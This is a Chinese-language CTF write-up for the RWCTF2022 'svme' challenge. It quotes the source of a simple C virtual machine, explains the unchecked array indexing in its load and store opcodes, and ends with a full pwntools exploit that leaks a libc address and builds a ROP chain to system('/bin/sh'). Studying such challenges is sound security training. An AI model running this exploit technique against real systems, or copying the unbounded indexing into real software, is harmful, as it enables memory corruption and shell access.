VM Pwn笔记

2022-01-30

RWCTF2022 svme

类别：clone-and-pwn

新的类别，是挖现实里的项目的洞，贴近实战，还是挺有意思的，就自己做了一遍

关键词：虚拟机，数组越界

源码

提供了main.c和Dockerfile，根据Docker File可以直接找到仓库simple-virtual-machine-C ，mian.c的逻辑很简单

#include <stdbool.h>
#include <unistd.h>
#include "vm.h"

int main(int argc, char *argv[]) {
    int code[128], nread = 0;
    while (nread < sizeof(code)) {
        int ret = read(0, code+nread, sizeof(code)-nread);
        if (ret <= 0) break;
        nread += ret;
    }
    VM *vm = vm_create(code, nread/4, 0);
    vm_exec(vm, 0, true);
    vm_free(vm);
    return 0;
}

因为vm_create的第三个参数nglobals是0，所以我当时下意识认为用不到全局操作，这也算是教训吧

然后因为调用了free，当时觉得可以打free_hook

VM的结构体如下

typedef struct {
    int *code;
    int code_size;

    // global variable space
    int *globals;
    int nglobals;

    // Operand stack, grows upwards
    int stack[DEFAULT_STACK_SIZE];
    Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;

主要需要分析的部分在头文件的vm_exec里，所有的数据类型都是int

void vm_exec(VM *vm, int startip, bool trace)
{
    // registers
    int ip;         // instruction pointer register
    int sp;         // stack pointer register
    int callsp;     // call stack pointer register

    int a = 0;
    int b = 0;
    int addr = 0;
    int offset = 0;

    ip = startip;
    sp = -1;
    callsp = -1;
    int opcode = vm->code[ip];

    while (opcode != HALT && ip < vm->code_size) {
        if (trace) vm_print_instr(vm->code, ip);
        ip++; //jump to next instruction or to operand
        switch (opcode) {
            case IADD:
                b = vm->stack[sp--];           // 2nd opnd at top of stack
                a = vm->stack[sp--];           // 1st opnd 1 below top
                vm->stack[++sp] = a + b;       // push result
                break;
            case ISUB:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = a - b;
                break;
            case IMUL:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = a * b;
                break;
            case ILT:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = (a < b) ? true : false;
                break;
            case IEQ:
                b = vm->stack[sp--];
                a = vm->stack[sp--];
                vm->stack[++sp] = (a == b) ? true : false;
                break;
            case BR:
                ip = vm->code[ip];
                break;
            case BRT:
                addr = vm->code[ip++];
                if (vm->stack[sp--] == true) ip = addr;
                break;
            case BRF:
                addr = vm->code[ip++];
                if (vm->stack[sp--] == false) ip = addr;
                break;
            case ICONST:
                vm->stack[++sp] = vm->code[ip++];  // push operand
                break;
            case LOAD: // load local or arg
                offset = vm->code[ip++];
                vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
                break;
            case GLOAD: // load from global memory
                addr = vm->code[ip++];
                vm->stack[++sp] = vm->globals[addr];
                break;
            case STORE:
                offset = vm->code[ip++];
                vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
                break;
            case GSTORE:
                addr = vm->code[ip++];
                vm->globals[addr] = vm->stack[sp--];
                break;
            case PRINT:
                printf("%d\n", vm->stack[sp--]);
                break;
            case POP:
                --sp;
                break;
            case CALL:
                // expects all args on stack
                addr = vm->code[ip++];          // index of target function
                int nargs = vm->code[ip++];     // how many args got pushed
                int nlocals = vm->code[ip++];   // how many locals to allocate
                ++callsp; // bump stack pointer to reveal space for this call
                vm_context_init(&vm->call_stack[callsp], ip, nargs+nlocals);
                // copy args into new context
                for (int i=0; i<nargs; i++) {
                    vm->call_stack[callsp].locals[i] = vm->stack[sp-i];
                }
                sp -= nargs;
                ip = addr;      // jump to function
                break;
            case RET:
                ip = vm->call_stack[callsp].returnip;
                callsp--; // pop context
                break;
            default:
                printf("invalid opcode: %d at ip=%d\n", opcode, (ip - 1));
                exit(1);
        }
        if (trace) vm_print_stack(vm->stack, sp);
        opcode = vm->code[ip];
    }
    if (trace) vm_print_data(vm->globals, vm->nglobals);
}

很明显，对于数组的操作未做任何检查

这里有两个指针可以关注：

code指针指向栈上的数组，只能读不能写（相当于text段嘛）。

globals指针指向堆块，可读（GLOAD）可写（GSTORE）。

⽤load和store可以越界修改vm结构体，而进行GSTORE和GLOAD的时候，都是通过global指针来确定global的位置的，此时如果global改成code指针，就可以利用GSTORE和GLOAD进行栈上的任意地址读写。

由于LOAD是借助我们输入的索引来寻址的，我们可以直接任意读，将code先行读到globals上

POP,
POP,
POP,	# sp ==> *globals
LOAD,	-997&0xffffffff,	# *globals_low = *code_low
LOAD,	-996&0xffffffff,	# *globals_high = *code_high

看一下code和rbp的距离，是0x210

那我想着push上去一个0x210，然后IADD不就得到rbp地址，然后就可以ret2libc了吗

但是要注意小端序的问题，高地址在高位，和sp相邻的是高位，想要加上去只能先加

POP,
POP,
POP,	# stack_low -> *globals_low
LOAD,	-997&0xffffffff,	# *globals_low = *code_low

ICONST,	0x210,
IADD,	# *globals_low += 0x210
LOAD,	-996&0xffffffff,	# *globals_high = *code_high

栈上就这么一个libc地址它的偏移是0x270b3，与code的偏移是0x218

既然还得用到之前的栈地址来算，不如一开始就存到stack上来计算（反正不涉及进位），利用STORE来写入更方便

EXP

from pwn import *

context.log_level = 'debug'
elf_path = "./svme"
libc_path = "./libc-2.31.so"

elf = ELF(elf_path)
libc = ELF(libc_path)
#p = process(["ld.so.2",elf_path],env={"LD_PRELOAD":libc_path}) 
p = process(elf_path)
PIE = 0

#-------------------Byte Code---------------------#
NOOP    = 0
IADD    = 1  # int add
ISUB    = 2
IMUL    = 3
ILT     = 4  # int less than
IEQ     = 5  # int equal
BR      = 6  # branch
BRT     = 7  # branch if true
BRF     = 8  # branch if true
ICONST  = 9  # push constant integer
LOAD    = 10   # load from local context
GLOAD   = 11   # load from global memory
STORE   = 12   # store in local context
GSTORE  = 13   # store in global memory
PRINT   = 14   # print stack top
POP     = 15   # throw away top of stack
CALL    = 16   # call function at address with nargs,nlocals
RET     = 17   # return value from function
HALT    = 18
#------------------------------------------------#

def debug(addr): 
 debug_str = ""
 if PIE:
  text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) 
  for i in addr:
   debug_str+='b *{}\n'.format(hex(text_base+i))
  gdb.attach(p,debug_str) 
 else:
  for i in addr:
   debug_str+='b *{}\n'.format(hex(i))
  gdb.attach(p,debug_str) 

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(eval(x)) + '\x1b[0m')
#---------------------------------------------------------------------------------------#

POP_RDI = 0x0000000000026b72
SH = 0x001b75aa
SYSTEM = libc.sym['system']
print(libc.search('/bin/sh'))
IDX = -0x90		# rbp - leak_addr

hello = [
	LOAD,	-996&0xffffffff,	# stack[0] = *code_high
	LOAD,	-997&0xffffffff,	# stack[1] = *code_low
	ICONST,	0x218,				# stack --> leak_addr
	IADD,						# stack[1] = *code_low + 0x218

	STORE,	-0x3E1&0xffffffff,  # *globals_low = *code_low
	STORE,	-0x3E0&0xffffffff,	# *globals_high = *code_high

	GLOAD,	0,					# sp --> leak
	ICONST,	0X270B3,
	ISUB,
	STORE,	0,					# locals[0] = libc_base_low

	GLOAD,	1,
	STORE,	1,					# locals[1] = libc_base_high

	LOAD,	0,
	ICONST,	POP_RDI,
	IADD,
	GSTORE,	IDX&0xffffffff,
	LOAD,	1,
	GSTORE,	(IDX+1)&0xffffffff,

	LOAD,	0,
	ICONST,	SH,
	IADD,
	GSTORE,	(IDX+2)&0xffffffff,
	LOAD,	1,
	GSTORE,	(IDX+3)&0xffffffff,

	LOAD,	0,
	ICONST,	POP_RDI+1,
	IADD,
	GSTORE,	(IDX+4)&0xffffffff,
	LOAD,	1,
	GSTORE,	(IDX+5)&0xffffffff,

	LOAD,	0,
	ICONST,	SYSTEM,
	IADD,
	GSTORE,	(IDX+6)&0xffffffff,
	LOAD,	1,
	GSTORE,	(IDX+7)&0xffffffff,	

	HALT]

payload = ''
for x in hello:
    payload += p32(x)

payload = payload.ljust(4*128,'\x00')
gdb.attach(p,'b *$rebase(0x198d)')
sdl(payload)
pause()
p.interactive()

总结

虚拟机pwn的难度主要是调试起来比较抽象，这题给了一个trace，还是比较友好的。

考察点应该算是汇编？总之这题要从汇编层面去理解。